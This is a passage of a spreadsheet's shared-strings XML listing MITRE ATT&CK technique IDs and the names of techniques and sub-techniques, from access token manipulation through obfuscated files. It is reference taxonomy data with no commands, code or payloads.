    <t>T1608.004</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>T1608.002</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>T1218.013</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1016.001</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>T1205.002</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>T1600</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Bypass User Account Control</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Setuid and Setgid</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Access Token Manipulation: Create Process with Token</t>
  </si>
  <si>
    <t>Access Token Manipulation: Make and Impersonate Token</t>
  </si>
  <si>
    <t>Access Token Manipulation: Parent PID Spoofing</t>
  </si>
  <si>
    <t>Access Token Manipulation: SID-History Injection</t>
  </si>
  <si>
    <t>Access Token Manipulation: Token Impersonation/Theft</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Account Discovery: Cloud Account</t>
  </si>
  <si>
    <t>Account Discovery: Domain Account</t>
  </si>
  <si>
    <t>Account Discovery: Email Account</t>
  </si>
  <si>
    <t>Account Discovery: Local Account</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Roles</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Email Delegate Permissions</t>
  </si>
  <si>
    <t>Account Manipulation: Device Registration</t>
  </si>
  <si>
    <t>Account Manipulation: SSH Authorized Keys</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Acquire Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Server</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Serverless</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Active Scanning: Scanning IP Blocks</t>
  </si>
  <si>
    <t>Active Scanning: Vulnerability Scanning</t>
  </si>
  <si>
    <t>Active Scanning: Wordlist Scanning</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle: ARP Cache Poisoning</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle: DHCP Spoofing</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t>Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t>Application Layer Protocol: Mail Protocols</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Custom Method</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Library</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Automated Exfiltration: Traffic Duplication</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Active Setup</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Authentication Package</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: LSASS Driver</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Login Items</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Port Monitors</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Print Processors</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Re-opened Applications</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Security Support Provider</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Shortcut Modification</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Time Providers</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: XDG Autostart Entries</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Login Hook</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Logon Script (Windows)</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Network Logon Script</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: RC Scripts</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts: Startup Items</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Browser Session Hijacking</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Brute Force: Credential Stuffing</t>
  </si>
  <si>
    <t>Brute Force: Password Cracking</t>
  </si>
  <si>
    <t>Brute Force: Password Guessing</t>
  </si>
  <si>
    <t>Brute Force: Password Spraying</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Cloud Infrastructure Discovery</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Cloud Storage Object Discovery</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: AppleScript</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: JavaScript</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Network Device CLI</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Python</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Visual Basic</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Compromise Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Compromise Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Compromise Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Compromise Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Domains</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Server</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Serverless</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Create Account: Cloud Account</t>
  </si>
  <si>
    <t>Create Account: Domain Account</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Agent</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Daemon</t>
  </si>
  <si>
    <t>Create or Modify System Process: Systemd Service</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Keychain</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Password Managers</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Securityd Memory</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Windows Credential Manager</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Data Manipulation: Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Data Manipulation: Stored Data Manipulation</t>
  </si>
  <si>
    <t>Data Manipulation: Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Data Obfuscation: Junk Data</t>
  </si>
  <si>
    <t>Data Obfuscation: Protocol Impersonation</t>
  </si>
  <si>
    <t>Data Obfuscation: Steganography</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>Data Staged: Remote Data Staging</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Data from Cloud Storage</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Data from Configuration Repository: Network Device Configuration Dump</t>
  </si>
  <si>
    <t>Data from Configuration Repository: SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Data from Information Repositories: Code Repositories</t>
  </si>
  <si>
    <t>Data from Information Repositories: Confluence</t>
  </si>
  <si>
    <t>Data from Information Repositories: Sharepoint</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Debugger Evasion</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Defacement: External Defacement</t>
  </si>
  <si>
    <t>Defacement: Internal Defacement</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Develop Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Develop Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Develop Capabilities: Exploits</t>
  </si>
  <si>
    <t>Develop Capabilities: Malware</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Content Wipe</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>Domain Policy Modification</t>
  </si>
  <si>
    <t>Domain Policy Modification: Domain Trust Modification</t>
  </si>
  <si>
    <t>Domain Policy Modification: Group Policy Modification</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>Dynamic Resolution: DNS Calculation</t>
  </si>
  <si>
    <t>Dynamic Resolution: Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Dynamic Resolution: Fast Flux DNS</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>Email Collection: Email Forwarding Rule</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection</t>
  </si>
  <si>
    <t>Email Collection: Remote Email Collection</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Encrypted Channel: Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Encrypted Channel: Symmetric Cryptography</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application or System Exploitation</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Establish Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Establish Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Establish Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>Event Triggered Execution: Accessibility Features</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppCert DLLs</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppInit DLLs</t>
  </si>
  <si>
    <t>Event Triggered Execution: Application Shimming</t>
  </si>
  <si>
    <t>Event Triggered Execution: Change Default File Association</t>
  </si>
  <si>
    <t>Event Triggered Execution: Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Event Triggered Execution: Emond</t>
  </si>
  <si>
    <t>Event Triggered Execution: Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Event Triggered Execution: Installer Packages</t>
  </si>
  <si>
    <t>Event Triggered Execution: LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Event Triggered Execution: Netsh Helper DLL</t>
  </si>
  <si>
    <t>Event Triggered Execution: PowerShell Profile</t>
  </si>
  <si>
    <t>Event Triggered Execution: Screensaver</t>
  </si>
  <si>
    <t>Event Triggered Execution: Trap</t>
  </si>
  <si>
    <t>Event Triggered Execution: Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Event Triggered Execution: Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Execution Guardrails: Environmental Keying</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium: Exfiltration over USB</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service: Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens</t>
  </si>
  <si>
    <t>Forge Web Credentials: Web Cookies</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Client Configurations</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Firmware</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Hardware</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Software</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Credentials</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Email Addresses</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Employee Names</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Gather Victim Network Information: DNS</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Domain Properties</t>
  </si>
  <si>
    <t>Gather Victim Network Information: IP Addresses</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Topology</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Trust Dependencies</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Business Relationships</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Determine Physical Locations</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Business Tempo</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Roles</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Hide Artifacts</t>
  </si>
  <si>
    <t>Hide Artifacts: Email Hiding Rules</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden File System</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Hide Artifacts: Process Argument Spoofing</t>
  </si>
  <si>
    <t>Hide Artifacts: Resource Forking</t>
  </si>
  <si>
    <t>Hide Artifacts: Run Virtual Instance</t>
  </si>
  <si>
    <t>Hide Artifacts: VBA Stomping</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Hijack Execution Flow: COR_PROFILER</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Side-Loading</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dylib Hijacking</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Hijack Execution Flow: KernelCallbackTable</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Cloud Logs</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Tools</t>
  </si>
  <si>
    <t>Impair Defenses: Downgrade Attack</t>
  </si>
  <si>
    <t>Impair Defenses: Impair Command History Logging</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking</t>
  </si>
  <si>
    <t>Impair Defenses: Safe Mode Boot</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Command History</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Mailbox Data</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Network Connection History and Configurations</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Persistence</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Indicator Removal: File Deletion</t>
  </si>
  <si>
    <t>Indicator Removal: Network Share Connection Removal</t>
  </si>
  <si>
    <t>Indicator Removal: Timestomp</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Input Capture: Credential API Hooking</t>
  </si>
  <si>
    <t>Input Capture: GUI Input Capture</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t>Input Capture: Web Portal Capture</t>
  </si>
  <si>
    <t>Inter-Process Communication</t>
  </si>
  <si>
    <t>Inter-Process Communication: Component Object Model</t>
  </si>
  <si>
    <t>Inter-Process Communication: Dynamic Data Exchange</t>
  </si>
  <si>
    <t>Inter-Process Communication: XPC Services</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Masquerading: Double File Extension</t>
  </si>
  <si>
    <t>Masquerading: Invalid Code Signature</t>
  </si>
  <si>
    <t>Masquerading: Masquerade Task or Service</t>
  </si>
  <si>
    <t>Masquerading: Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>Masquerading: Rename System Utilities</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>Masquerading: Space after Filename</t>
  </si>
  <si>
    <t>Modify Authentication Process</t>
  </si>
  <si>
    <t>Modify Authentication Process: Domain Controller Authentication</t>
  </si>
  <si>
    <t>Modify Authentication Process: Hybrid Identity</t>
  </si>
  <si>
    <t>Modify Authentication Process: Multi-Factor Authentication</t>
  </si>
  <si>
    <t>Modify Authentication Process: Network Device Authentication</t>
  </si>
  <si>
    <t>Modify Authentication Process: Password Filter DLL</t>
  </si>
  <si>
    <t>Modify Authentication Process: Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Modify Authentication Process: Reversible Encryption</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Cloud Instance</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Snapshot</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Delete Cloud Instance</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Revert Cloud Instance</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Modify System Image</t>
  </si>
  <si>
    <t>Modify System Image: Downgrade System Image</t>
  </si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Request Generation</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Network Boundary Bridging: Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Network Denial of Service: Direct Network Flood</t>
  </si>
  <si>
    <t>Network Denial of Service: Reflection Amplification</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>OS Credential Dumping: /etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>OS Credential Dumping: Cached Domain Credentials</t>
  </si>
  <si>
    <t>OS Credential Dumping: DCSync</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t>OS Credential Dumping: Proc Filesystem</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Binary Padding</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Compile After Delivery</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Dynamic API Resolution</t>
  </si>
  <si>
